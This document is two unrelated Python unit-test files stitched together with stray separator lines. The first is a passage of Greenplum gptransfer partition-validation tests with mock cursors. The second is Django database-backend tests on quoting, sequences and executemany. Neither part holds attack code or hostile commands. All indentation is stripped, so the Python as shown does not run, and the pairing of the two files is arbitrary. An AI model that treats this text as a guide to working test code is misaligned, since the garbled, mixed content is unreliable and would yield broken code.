["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_column_type_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['table_info']: [
["t", "my_new_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_max_levels_fails(self):
options = self.setup_partition_validation()
additional = {
"select max(p1.partitionlevel)": [2],
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Max level of partition is not same between", log_messages[0])
def test__validate_bad_partition_different_values_of_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 1, "3 4"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Partition column attributes are different at level", log_messages[0])
def test__validate_partition_transfer_when_different_partition_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 2, "3 4"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Number of partition columns is different at level", log_messages[0])
def test__validate_bad_partition_different_parent_kind_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["different_parkind", 1, "my_parnatts", "my_paratts"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Partition type is different at level", log_messages[0])
def test__validate_bad_partition_different_number_of_attributes_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['partition_info']: [["my_parkind", 1, 2, "my_paratts"]],
}
self.cursor.side_effect = CursorSideEffect(additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Partition type or key is different between", log_messages[1])
self.assertIn("Number of partition columns is different at level ", log_messages[0])
def test__validate_bad_partition_different_partition_values_fails(self):
options = self.setup_partition_validation()
additional = {
"select n.nspname, c.relname": [["not_public", "not_my_table", ""], ["public", "my_table_partition1", ""]],
"select parisdefault, parruleord, parrangestartincl,": ["t", "1", "t", "t", 100, 10, "", ""],
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("One of the subpartition table is a default partition", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def test__validate_bad_partition_unknown_type_fails(self):
options = self.setup_partition_validation()
my_singleton = SingletonSideEffect()
my_singleton.values["select partitiontype"] = ["unknown"]
self.db_singleton.side_effect = my_singleton.singleton_side_effect
with self.assertRaisesRegexp(Exception, "Unknown partitioning type "):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_different_list_values_fails(self):
options = self.setup_partition_validation()
additional = {
"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, "", "different"],
}
my_singleton = SingletonSideEffect(additional)
my_singleton.values["select partitiontype"] = [["list"]]
self.db_singleton.side_effect = my_singleton.singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("List partition value is different between", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def test__validate_bad_partition_different_range_values_fails(self):
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "f", "t", 100, 10, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "f", 999, 10, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 999, "", "different"]})
self.run_range_partition_value(
{"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, 999, "different"]})
def test__validate_bad_partition_different_parent_partition_fails(self):
options = self.setup_partition_validation()
multi = {
"select parisdefault, parruleord, parrangestartincl,": [["f", "1", "t", "t", 100, 10, "", ""],
["f", "1", "t", "t", 100, 10, "", ""],
["f", "1", "t", "t", 999, 10, "", ""]],
}
singleton_side_effect = SingletonSideEffect(multi_list=multi)
self.db_singleton.side_effect = singleton_side_effect.singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
error_messages = self.get_error_logging()
self.assertIn("Range partition value is different between source partition table", error_messages[0])
self.assertIn("Partitions have different parents at level", error_messages[1])
def test__validate_pt_non_pt_target_with_validator__fails(self):
options = self.setup_partition_to_normal_validation()
options['validator'] = "MD5"
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --validate option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_partition_transfer__fails(self):
options = self.setup_partition_to_normal_validation()
options['partition_transfer'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer option cannot be used with --partition-transfer-non-partition-target option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_without_input_file__fails(self):
options = self.setup_partition_to_normal_validation()
options['input_file'] = None
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option must be used with -f option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_databases__fails(self):
options = self.setup_partition_to_normal_validation()
options['databases'] = ['db1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with -d option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_dest_databases__fails(self):
options = self.setup_partition_to_normal_validation()
options['dest_database'] = ['db1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --dest-database option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_drop__fails(self):
options = self.setup_partition_to_normal_validation()
options['drop'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --drop option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_tables__fails(self):
options = self.setup_partition_to_normal_validation()
options['tables'] = ['public.table1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with -t option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_schema_only__fails(self):
options = self.setup_partition_to_normal_validation()
options['schema_only'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --schema-only option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_full__fails(self):
options = self.setup_partition_to_normal_validation()
options['full'] = True
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with --full option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_exclude_input_file__fails(self):
options = self.setup_partition_to_normal_validation()
options['exclude_input_file'] = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with any exclude table option"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_pt_non_pt_target_with_exclude_tables__fails(self):
options = self.setup_partition_to_normal_validation()
options['exclude_tables'] = ['public.table1']
with self.assertRaisesRegexp(Exception, "--partition-transfer-non-partition-target option cannot be used with any exclude table option"):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_normal_multiple_same_dest_must_come_from_same_source_partition(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table\nmy_first_database.public.my_table_partition2, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
class SingletonSideEffectWithIterativeReturns(SingletonSideEffect):
def __init__(self, multi_value=None):
SingletonSideEffect.__init__(self, multi_list=multi_value)
self.values["SELECT count(*) FROM public.my_normal_table"] = [[[30, 15, 15]]]
self.counters["SELECT count(*) FROM public.my_normal_table"] = 0
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
if any(isinstance(i, list) for i in value_list):
result = result[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
multi_value = {
"select n.nspname, c.relname": [["public", "my_table_partition1"], ["public", "other_parent"]]
}
self.db_singleton.side_effect = SingletonSideEffectWithIterativeReturns(multi_value=multi_value).singleton_side_effect
with self.assertRaisesRegexp(Exception, "partition sources: public.my_table_partition1, "
"public.my_table_partition2, when transferred to "
"the same destination: table public.my_normal_table , "
"must share the same parent"):
self.subject.GpTransfer(Mock(**options), []).run()
def test__validating_transfer_with_empty_source_map_file_raises_proper_exception(self):
options = self.setup_partition_to_normal_validation()
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("")
source_map_filename.flush()
options.update(
source_map_file=source_map_filename.name
)
with self.assertRaisesRegexp(Exception, "No hosts in map"):
self.subject.GpTransfer(Mock(**options), [])
def test__row_count_validation_escapes_schema_and_table_names(self):
self.subject.escapeDoubleQuoteInSQLString.side_effect = ['"escapedSchema"', '"escapedTable"', '"escapedSchema"', '"escapedTable"']
escaped_query = 'SELECT count(*) FROM "escapedSchema"."escapedTable"'
table_mock = Mock(spec=['schema','table'])
table_mock.schema = 'mySchema'
table_mock.table = 'myTable'
table_pair = Mock(spec=['source','dest'])
table_pair.source = table_mock
table_pair.dest = table_mock
validator = self.subject.CountTableValidator('some_work_dir', table_pair, 'fake_db_connection', 'fake_db_connection')
self.assertEqual(escaped_query, validator._src_sql)
self.assertEqual(escaped_query, validator._dest_sql)
####################################################################################################################
# End of tests, start of private methods/objects
####################################################################################################################
def get_error_logging(self):
return [args[0][0] for args in self.subject.logger.error.call_args_list]
def get_info_messages(self):
return [args[0][0] for args in self.subject.logger.info.call_args_list]
def get_warnings(self):
return [args[0][0] for args in self.subject.logger.warning.call_args_list]
def _get_gptransfer_command(self):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
return gptransfer.GpTransferCommand(**cmd_args)
def run_range_partition_value(self, additional):
options = self.setup_partition_validation()
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
with self.assertRaisesRegexp(Exception, "has different partition criteria from destination table"):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_error_logging()
self.assertIn("Range partition value is different between", log_messages[0])
self.assertIn("Partition value is different in the partition hierarchy between", log_messages[1])
def createGpArrayWith2Primary2Mirrors(self):
master = GpDB.initFromString(
"1|-1|p|p|s|u|mdw|mdw|5432|None|/data/master||/data/master/base/10899,/data/master/base/1,/data/master/base/10898,/data/master/base/25780,/data/master/base/34782")
primary0 = GpDB.initFromString(
"2|0|p|p|s|u|sdw1|sdw1|40000|41000|/data/primary0||/data/primary0/base/10899,/data/primary0/base/1,/data/primary0/base/10898,/data/primary0/base/25780,/data/primary0/base/34782")
primary1 = GpDB.initFromString(
"3|1|p|p|s|u|sdw2|sdw2|40001|41001|/data/primary1||/data/primary1/base/10899,/data/primary1/base/1,/data/primary1/base/10898,/data/primary1/base/25780,/data/primary1/base/34782")
mirror0 = GpDB.initFromString(
"4|0|m|m|s|u|sdw2|sdw2|50000|51000|/data/mirror0||/data/mirror0/base/10899,/data/mirror0/base/1,/data/mirror0/base/10898,/data/mirror0/base/25780,/data/mirror0/base/34782")
mirror1 = GpDB.initFromString(
"5|1|m|m|s|u|sdw1|sdw1|50001|51001|/data/mirror1||/data/mirror1/base/10899,/data/mirror1/base/1,/data/mirror1/base/10898,/data/mirror1/base/25780,/data/mirror1/base/34782")
return GpArray([master, primary0, primary1, mirror0, mirror1])
def setup_partition_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_table_partition1")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
partition_transfer=True,
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
def setup_partition_to_normal_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_table_partition1, "
"my_second_database.public.my_normal_table")
additional = {
cursor_keys['relations']: ["my_relname", "another_rel"],
}
self.cursor.side_effect = CursorSideEffect(additional=additional).cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
partition_transfer_non_pt_target=True,
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
def setup_normal_to_normal_validation(self):
source_map_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
source_map_filename.write("sdw1,12700\nsdw2,12700")
source_map_filename.flush()
input_filename = tempfile.NamedTemporaryFile(dir=self.TEMP_DIR, delete=False)
input_filename.write("my_first_database.public.my_normal_table")
input_filename.flush()
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal1_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.second_values["normal_tables"] = [[]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
self.db_singleton.side_effect = SingletonSideEffect().singleton_side_effect
options = {}
options.update(self.GpTransfer_options_defaults)
options.update(
input_file=input_filename.name,
source_map_file=source_map_filename.name,
base_port=15432,
max_line_length=32768,
work_base_dir="/tmp",
source_port=45432,
dest_port=15432,
)
return options
class CursorSideEffect:
def __init__(self, additional=None):
self.first_values = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""]],
cursor_keys['relations']: ["my_relname"],
cursor_keys['table_info']: [
["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
cursor_keys['partition_info']: [["my_parkind", 1, 1, "1"]],
cursor_keys['schema_name']: ["public"],
cursor_keys['create_schema']: ["my_schema"],
cursor_keys['ordinal_pos']: [[1]],
}
self.counters = dict((key, 0) for key in self.first_values.keys())
self.second_values = self.first_values.copy()
if additional:
self.second_values.update(additional)
def cursor_side_effect(self, *args):
for key in self.first_values.keys():
for arg in args[1:]:
arg_oneline = " ".join(arg.split("\n"))
if key.search(arg_oneline):
if self.has_called(key):
return FakeCursor(self.second_values[key])
return FakeCursor(self.first_values[key])
return None
def has_called(self, key):
self.counters[key] += 1
return self.counters[key] > 1
def append_regexp_key(self, key, value):
self.first_values[key] = value
self.second_values[key] = value
self.counters[key] = 0
class FakeCursor:
def __init__(self, my_list):
self.list = []
if my_list:
self.list = my_list
self.rowcount = len(self.list)
def __iter__(self):
return iter(self.list)
def close(self):
pass
def fetchall(self):
return self.list
# Represents partition info
class SingletonSideEffect:
def __init__(self, additional=None, multi_list=None):
self.values = {
"select partitiontype": ["range"],
"select max(p1.partitionlevel)": [1],
"select schemaname, tablename from pg_catalog.pg_partitions": ["public", "my_table_partition1"],
"select c.oid": ["oid1", "oid1"],
"select parisdefault, parruleord, parrangestartincl,": ["f", "1", "t", "t", 100, 10, "", ""],
"select n.nspname, c.relname": ["public", "my_table_partition1"],
"SELECT count(*) FROM": [20]
}
self.counters = dict((key, 0) for key in self.values.keys())
# make values into list to accommodate multiple sequential values
self.values = dict((key, [value]) for (key, value) in self.values.iteritems())
for key in self.values.keys():
if additional:
if key in additional:
value = self.values[key]
value.append(additional[key])
if multi_list:
if key in multi_list:
value = self.values[key]
value.extend(multi_list[key])
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
if __name__ == '__main__':
run_tests()
|
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import absolute_import
import datetime
import threading
from django.conf import settings
from django.core.management.color import no_style
from django.core.exceptions import ImproperlyConfigured
from django.db import (backend, connection, connections, DEFAULT_DB_ALIAS,
IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.utils import ConnectionHandler, DatabaseError, load_backend
from django.test import (TestCase, skipUnlessDBFeature, skipIfDBFeature,
TransactionTestCase)
from django.test.utils import override_settings
from django.utils import unittest
from . import models
class OracleChecks(unittest.TestCase):
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
convert_unicode = backend.convert_unicode
cursor = connection.cursor()
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!'),])
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
cursor = connection.cursor()
var = cursor.var(backend.Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle cursor semantics")
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
c = connection.cursor()
c.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join([unicode(x) for x in xrange(4000)])
c.execute('INSERT INTO ltext VALUES (%s)',[long_str])
c.execute('SELECT text FROM ltext')
row = c.fetchone()
self.assertEqual(long_str, row[0].read())
c.execute('DROP TABLE ltext')
@unittest.skipUnless(connection.vendor == 'oracle',
"No need to check Oracle connection semantics")
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.cursor() # Ensure the connection is initialized.
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
class MySQLTests(TestCase):
@unittest.skipUnless(connection.vendor == 'mysql',
"Test valid only for MySQL")
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5,0,13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.datetime(2010, 1, 1, 0, 0)])
def test_django_extract(self):
"""
Test the custom ``django_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
class LastExecutedQueryTest(TestCase):
def setUp(self):
# connection.queries will not be filled in without this
settings.DEBUG = True
def tearDown(self):
settings.DEBUG = False
# There are no tests for the sqlite backend because it does not
# implement paramater escaping. See #14091.
@unittest.skipUnless(connection.vendor in ('oracle', 'postgresql'),
"These backends use the standard parameter escaping rules")
def test_parameter_escaping(self):
# check that both numbers and string are properly quoted
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
self.assertTrue("= 'special:\\\"'':' " in sql)
self.assertTrue("= 12 " in sql)
@unittest.skipUnless(connection.vendor == 'mysql',
"MySQL uses backslashes to escape parameters.")
def test_parameter_escaping(self):
list(models.Tag.objects.filter(name="special:\\\"':", object_id=12))
sql = connection.queries[-1]['sql']
# only this line is different from the test above
self.assertTrue("= 'special:\\\\\\\"\\':' " in sql)
self.assertTrue("= 12 " in sql)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1,2,3),])
self.assertRaises(Exception, cursor.executemany, query, [(1,),])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
class PostgresVersionTest(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
class PostgresNewConnectionTest(TestCase):
"""
#17062: PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back.
"""
@unittest.skipUnless(
connection.vendor == 'postgresql' and connection.isolation_level > 0,
"This test applies only to PostgreSQL without autocommit")
def test_connect_and_rollback(self):
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
try:
new_connection.close()
except DatabaseError:
pass
# Unfortunately with sqlite3 the in-memory test database cannot be
# closed, and so it cannot be re-opened during testing, and so we
# sadly disable this test for now.
class ConnectionCreatedSignalTest(TestCase):
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
cursor = connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
cursor = connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is a sqlite-specific issue")
def test_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
response = cursor.execute(
"select strftime('%%s', date('now'))").fetchall()[0][0]
self.assertNotEqual(response, None)
# response should be an non-zero integer
self.assertTrue(int(response))
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
cursor.executemany(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i**2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i**2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i**2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i**2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
